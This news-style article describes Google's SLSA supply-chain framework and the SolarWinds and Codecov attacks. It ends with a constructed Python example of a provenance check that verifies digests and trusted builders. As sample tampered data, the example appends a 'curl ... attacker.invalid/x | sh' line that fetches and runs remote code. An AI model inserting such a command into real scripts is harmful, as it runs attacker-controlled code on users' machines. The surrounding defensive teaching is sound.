Google has proposed a new framework to mitigate the growing risks posed by attacks on the software supply chain.
The Supply Chain Levels for Software Artifacts (SLSA, pronounced “salsa”) is designed to ensure the integrity of software artifacts across the entire supply chain.
It’s based on Google’s own Binary Authorization for Borg framework, which the tech giant has been using as standard for all its production workloads for over eight years.
“The goal of SLSA is to improve the state of the industry, particularly open source, to defend against the most pressing integrity threats,” Google explained. “With SLSA, consumers can make informed choices about the security posture of the software they consume.”
A typical software supply chain has several points where an attacker can strike: the source repository and the source control platform, the build system, and the package repository that consumers download from, along with every third-party dependency pulled in along the way.
The SolarWinds attackers, who went on to breach nine US government agencies, compromised the build platform and installed an implant that injected malicious behavior into each build, for example.
In another recent supply chain attack, affecting US firm Codecov, attackers used leaked credentials to upload a malicious artifact that had not been built by the company’s CI/CD system. Users unwittingly downloaded it directly from Codecov’s Google Cloud Storage bucket.
SLSA would have helped prevent both, Google claimed: by requiring more robust security controls on the SolarWinds build platform, and by flagging the Codecov artifact because it carried no provenance showing it had been produced by the company’s CI/CD system.
It described SLSA as a “set of incrementally adoptable security guidelines” with four levels designed to go beyond best practice approaches.
“It will support the automatic creation of auditable metadata that can be fed into policy engines to give ‘SLSA certification’ to a particular package or build platform. SLSA is designed to be incremental and actionable, and to provide security benefits at every step,” Google explained.
“Once an artifact qualifies at the highest level, consumers can have confidence that it has not been tampered with and can be securely traced back to source — something that is difficult, if not impossible, to do with most software today.”
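The kind of policy check Google describes, fed by build provenance, is easier to see in code. The following is an added example written for this article; it is not Google's code, not part of SLSA's reference tooling, and not from Codecov or SolarWinds. It uses a simplified in-toto style statement modelled on SLSA's provenance format (the exact field names, the builder ID, the sample script and the "attacker" URL are all constructed assumptions), and it checks three things a consumer would want before trusting a download: that provenance exists at all, that the provenance names the exact digest of the bytes downloaded, and that the provenance was produced by a builder the consumer trusts. The Codecov scenario, an artifact uploaded outside the build system, shows up as the first two failures.

```python
import hashlib
import json
from typing import Optional

# --- Constructed sample data (assumptions, not real artifacts or builders) ---
TRUSTED_BUILDERS = {"https://ci.example.com/builder/v1"}  # assumed trusted CI builder ID

# A stand-in for a shell uploader script and a tampered copy of it.
GOOD_ARTIFACT = b"#!/bin/bash\necho 'uploading coverage report'\n"
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"curl -s https://attacker.invalid/x | sh\n"

STATEMENT_TYPE = "https://in-toto.io/Statement/v0.1"
PREDICATE_TYPE = "https://slsa.dev/provenance/v0.1"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_provenance(name: str, data: bytes, builder_id: str) -> dict:
    """Build a simplified in-toto Statement carrying a SLSA-style provenance predicate.

    Only the fields this example's policy inspects are populated; field layout
    follows SLSA provenance in outline and should be treated as an assumption.
    A real builder would sign this statement; signing is omitted here.
    """
    return {
        "_type": STATEMENT_TYPE,
        "subject": [{"name": name, "digest": {"sha256": sha256_hex(data)}}],
        "predicateType": PREDICATE_TYPE,
        "predicate": {
            "builder": {"id": builder_id},
            # Constructed source reference; a real statement would carry the real commit.
            "materials": [{"uri": "git+https://example.com/repo", "digest": {"sha1": "0" * 40}}],
        },
    }


def verify_artifact(data: bytes, statement: Optional[dict], trusted_builders: set) -> tuple:
    """Policy check: return (accepted, reason) for a downloaded artifact.

    Accept only if provenance exists, names this artifact's digest as a subject,
    and was produced by a trusted builder. Missing provenance is a failure, not a
    pass: an artifact uploaded outside the build system has none.
    """
    if statement is None:
        return False, "no provenance: artifact was not produced by the build system"
    if statement.get("_type") != STATEMENT_TYPE or statement.get("predicateType") != PREDICATE_TYPE:
        return False, "unexpected statement or predicate type"
    digest = sha256_hex(data)
    subject_digests = {s.get("digest", {}).get("sha256") for s in statement.get("subject", [])}
    if digest not in subject_digests:
        return False, f"digest mismatch: sha256={digest} is not a subject of the provenance"
    builder = statement.get("predicate", {}).get("builder", {}).get("id")
    if builder not in trusted_builders:
        return False, f"untrusted builder {builder!r}"
    return True, f"ok: built by {builder}"


# Provenance the (assumed) CI builder produced for the good artifact.
GOOD_PROVENANCE = make_provenance("uploader.sh", GOOD_ARTIFACT, "https://ci.example.com/builder/v1")
# Provenance an attacker could forge for the tampered copy, naming a builder nobody trusts.
ROGUE_PROVENANCE = make_provenance("uploader.sh", TAMPERED_ARTIFACT, "https://laptop.attacker.invalid/manual")


def main() -> None:
    print(json.dumps(GOOD_PROVENANCE, indent=2))
    scenarios = [
        ("untampered artifact with CI provenance", GOOD_ARTIFACT, GOOD_PROVENANCE),
        ("tampered artifact served with the CI provenance", TAMPERED_ARTIFACT, GOOD_PROVENANCE),
        ("tampered artifact uploaded with no provenance (Codecov-style)", TAMPERED_ARTIFACT, None),
        ("tampered artifact with attacker-forged provenance", TAMPERED_ARTIFACT, ROGUE_PROVENANCE),
    ]
    for label, data, statement in scenarios:
        accepted, reason = verify_artifact(data, statement, TRUSTED_BUILDERS)
        print(f"{'ACCEPT' if accepted else 'REJECT'}  {label}: {reason}")


if __name__ == "__main__":
    main()
```

One caveat a practitioner should keep in mind: the forged-provenance case is only rejected here because the builder ID is not on the trust list. In a real deployment the statement is wrapped in a signed envelope, and the consumer must verify that signature against the trusted builder's key before reading any field, otherwise an attacker simply writes the trusted builder's ID into their own statement.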